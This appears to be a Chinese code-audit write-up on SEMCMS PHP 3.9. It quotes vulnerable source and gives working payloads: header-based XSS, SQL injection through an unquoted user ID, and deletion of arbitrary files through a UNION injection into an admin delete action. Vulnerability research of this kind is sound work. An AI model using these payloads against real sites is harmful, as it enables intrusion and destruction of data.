漏洞代码
CaMtfK_Admin/SEMCMS_Top.php 71行
function getRealIp(){
$ip=FALSE;
if(!empty($_SERVER["HTTP_CLIENT_IP"])){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
for ($i = 0; $i < count($ips); $i++) {
if (!eregi ("/^(10│172.16│192.168)./i", $ips[$i])) {
$ip = $ips[$i];
break;
}
}
}
return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}
payload
http://127.0.0.1/SEMCMS_PHP_3.9/CaMtfK_Admin/SEMCMS_Top.php
请求头
CLIENT-IP: <script>alert(1)</script>
if (isset($_GET)){$GetArray=$_GET;}else{$GetArray='';} //get
foreach ($GetArray as $value){ //get
verify_str($value);
}
function inject_check_sql($sql_str) {
return preg_match('/select|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str);
}
function verify_str($str) {
if(inject_check_sql($str)) {
exit('Sorry,You do this is wrong! (.-.)');
}
return $str;
}
- 过滤只过滤了GET,没有过滤POST
- 如果支持堆叠查询的话,用预编译prepare、handler、show也可以注
- 并且这个cms有很多地方,都是没有用单引号闭合的,数字型的SQL注入,或者万能密码
SEMCMS_Function.php 858行
}elseif ($CF=="fenpei"){
$area_arr = $_POST["ID"]; //刚开始在这里被坑了,大写的ID
$uid=$_POST['uid'];
if ($area_arr==""){
header("Location:SEMCMS_User.php?err=005");
}else{
$area_arr = implode(",",$area_arr); //接收到数据用,链接
$db_conn->query("update sc_user set user_qx='$area_arr' where ID=$uid");
header("Location:SEMCMS_User.php?&err=001");
}
重点在这
$db_conn->query("update sc_user set user_qx='$area_arr' where ID=$uid");
$uid直接带入到了update语句中。
SEMCMS_Function.php里面有个$Ant=new AntDateProcess();
这个类在contorl.php下,所以需要找一个文件把SEMCMS_Function.php和contorl.php两个文件联系起来,
SEMCMS_Top_include.php
<?php
include_once './Include/inc.php';
include_once 'SEMCMS_Function.php';
Include/inc.php
<?php
ob_start();
include_once '../Include/db_conn.php';
include_once '../Include/contorl.php';
include_once 'function.php';
验证
看网络延时
这个删除文件的代码写的就有问题,就差找到一个可控点
xxx_Admin/Include/function.php
function Delfile($filename){
if(file_exists($filename)){
unlink($filename);
}
$filename=str_replace("prdoucts/", "prdoucts/small/", $filename);
if(file_exists($filename)){
unlink($filename);
}
}
有三个地方调用了他
变量都是从数据库过来的,跟进
看第一个删除调用 Function.php 475行
case 'Deleted':
if ($area_arr==""){
header("Location:SEMCMS_Banner.php?lgid=".$languageID."&err=004");
}else{
//删除图片
$query=$db_conn->query("select * from sc_banner WHERE ID in ($area_arr)");
while($row=mysqli_fetch_array($query)){
Delfile($row['banner_image']);
}
需要控制CF Class这两个变量才能走到这里
CF Class,这两个变量都是从前端传过来的,都可控。
$area_arr = array();
if (isset($_GET["Class"])){$Class = $_GET["Class"];}else{$Class="";}
if (isset($_GET["CF"])){$CF = $_GET["CF"];}else{$CF="";}
。。。。
if (isset($_POST["AID"])){$area_arr = $_POST["AID"];$area_arr = implode(",",$area_arr);//用特定的字符把数组连成字符串
闭合SQL
从数据库中获取到的数据是 banner_image,他在banner表中的第二列,所以控制union的第二列是要删除的文件名,就可以。
mysql> select * from sc_banner where ID in (66) union select 1,2,3,4,5,6,7;
+----+--------------+------------+---------------+------------+-------------+--------------+
| ID | banner_image | banner_url | banner_fenlei | languageID | banner_time | banner_paixu |
+----+--------------+------------+---------------+------------+-------------+--------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
+----+--------------+------------+---------------+------------+-------------+--------------+
1 row in set (0.00 sec)
mysql> select * from sc_banner where ID in (66) union select 1,0x312e747874,3,4,5,6,7;
+----+--------------+------------+---------------+------------+-------------+--------------+
| ID | banner_image | banner_url | banner_fenlei | languageID | banner_time | banner_paixu |
+----+--------------+------------+---------------+------------+-------------+--------------+
| 1 | 1.txt | 3 | 4 | 5 | 6 | 7 |
+----+--------------+------------+---------------+------------+-------------+--------------+
1 row in set (0.00 sec)
在Admin目录下新建一个1.txt文件
1.txt
16进制编码一下 ==> 0x312e747874
这个文件的相对路径要根据SEMCMS_Top_include.php来判断,不是相对function.php的路径。
payload
http://127.0.0.1/SEMCMS_PHP_3.9/CaMtfK_Admin/SEMCMS_Top_include.php?CF=banner&Class=Deleted
post
AID[0]=66) union select 1,0x312e747874,3,4,5,6,7%23
结果,1.txt已经没了